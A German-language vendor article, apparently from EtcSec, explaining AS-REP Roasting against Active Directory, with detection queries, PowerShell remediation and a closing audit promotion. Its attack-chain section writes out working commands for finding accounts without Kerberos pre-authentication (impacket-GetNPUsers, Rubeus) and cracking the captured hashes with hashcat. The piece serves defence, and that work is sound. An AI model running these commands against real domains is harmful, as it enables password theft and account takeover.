Was ist AS-REP Roasting?
AS-REP Roasting ist ein Active Directory-Angriff, der Konten mit deaktivierter Kerberos-Vorauthentifizierung angreift. Jeder Angreifer, sogar ohne Anmeldedaten, kann eine AS-REP-Antwort für diese Konten anfordern und einen mit ihrem Passwort-Hash verschlüsselten Blob erhalten, der offline geknackt werden kann.
Im Gegensatz zu Kerberoasting erfordert AS-REP Roasting überhaupt keine Anmeldedaten, wenn der Angreifer Netzwerkzugriff auf die Domain hat.
Die Schwachstelle stammt von einer Kerberos-Option namens DONT_REQUIRE_PREAUTH. Wenn diese für ein Konto aktiviert ist, überspringt das KDC den Vorauthentifizierungsschritt und stellt direkt eine AS-REP aus, die Daten enthält, die mit dem Konto-Hash verschlüsselt sind.
⚠️ Wesentlicher Unterschied zu Kerberoasting: Kerberoasting erfordert ein gültiges Domain-Konto. AS-REP Roasting kann ohne jede Anmeldedaten von ausserhalb der Domain durchgeführt werden.
Funktionsweise
In Standard-Kerberos muss der Client vor der TGT-Ausstellung beweisen, dass er das Passwort kennt, indem er einen verschlüsselten Zeitstempel sendet. Das verhindert das Sammeln von Hashes.
Wenn DONT_REQUIRE_PREAUTH gesetzt ist, wird dieser Schritt übersprungen. Das KDC antwortet auf jede AS-REQ für dieses Konto mit einer AS-REP, die einen mit dem NTLM-Hash verschlüsselten Sitzungsschlüssel enthält, ohne jede Identitätsprüfung.
Die Angriffskette
Schritt 1 - Anfällige Konten aufzählen
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties DoesNotRequirePreAuth, PasswordLastSet |
Select-Object SamAccountName, PasswordLastSet
# Ohne Anmeldedaten
impacket-GetNPUsers corp.local/ -usersfile users.txt -no-pass -dc-ip 10.10.0.1
# Mit Domain-Konto
impacket-GetNPUsers corp.local/user:password -request -dc-ip 10.10.0.1
Schritt 2 - AS-REP Hashes sammeln
.\Rubeus.exe asreproast /format:hashcat /outfile:asrep_hashes.txt
Schritt 3 - Offline knacken
# Modus 18200 für AS-REP Hashes
hashcat -m 18200 asrep_hashes.txt /usr/share/wordlists/rockyou.txt --rules-file best64.rule
Schritt 4 - Kontoübernahme
Ein geknackter AS-REP Hash liefert das Klartext-Passwort des Kontos. Der Angreifer kann sich dann als dieser Benutzer authentifizieren und das Konto als Pivotpunkt nutzen.
Erkennung
Windows Event IDs
| Event ID | Quelle | Worauf zu achten ist |
|---|---|---|
| 4768 | DC - Security | AS-REQ mit Pre-Authentication Type: 0 — Vorauthentifizierung nicht bereitgestellt |
| 4768 | DC - Security | Mehrere AS-REQ für verschiedene Konten von derselben IP |
💡 Tipp: Ein einziges 4768-Ereignis mit Pre-Auth-Typ 0 für ein Konto, das normalerweise Vorauthentifizierung erfordert, ist ein Hochvertrauens-Alert.
SIEM-Erkennungsabfrage (Elastic KQL)
event.code: "4768" AND
winlog.event_data.PreAuthType: "0" AND
winlog.event_data.Status: "0x0"
Behebung
💡 Schnelle Massnahme: Aktivieren Sie die Vorauthentifizierung für alle Konten, bei denen sie deaktiviert ist. Das ist eine einzeilige Korrektur pro Konto ohne Benutzerauswirkung.
Vorauthentifizierung reaktivieren
# Einzelnes Konto
Set-ADAccountControl -Identity vulnerable_user -DoesNotRequirePreAuth $false
# Massenkorrektur
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | ForEach-Object {
Set-ADAccountControl -Identity $_ -DoesNotRequirePreAuth $false
Write-Host "Behoben: $($_.SamAccountName)"
}
Härten
- Alle anfälligen Konten auditieren:
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} -Properties PasswordLastSet, Description |
Select-Object SamAccountName, PasswordLastSet, Description |
Export-Csv anfaellige_konten_asrep.csv -NoTypeInformation
- Passwörter betroffener Konten rotieren — auch nach Reaktivierung der Vorauthentifizierung.
Get-ADUser -Filter {DoesNotRequirePreAuth -eq $true} | Set-ADUser -ChangePasswordAtLogon $true
- Anonymen LDAP-Zugriff einschränken, um nicht authentifizierte Aufzählung des Flags zu verhindern.
So Erkennt EtcSec Dies
EtcSec meldet Konten mit deaktivierter Kerberos-Vorauthentifizierung bei jedem AD-Audit.
Die ASREP_ROASTING_RISK-Erkennung identifiziert alle Konten mit gesetztem DONT_REQUIRE_PREAUTH, unabhängig davon, ob sie bereits angegriffen wurden.
Verwandte Prüfungen:
- PASSWORD_NEVER_EXPIRES - Konten mit deaktivierter Vorauthentifizierung und nie ablaufenden Passwörtern sind dauerhaft exponiert
- PASSWORD_POLICY_WEAK - schwache Richtlinie macht offline Cracking schneller
- WEAK_KERBEROS_POLICY - permissive Kerberos-Einstellungen verlängern das Angriffsfenster
ℹ️ Hinweis: EtcSec prüft diese Schwachstellen automatisch bei jedem AD-Audit. Starten Sie ein kostenloses Audit, um exponierte Konten zu identifizieren.
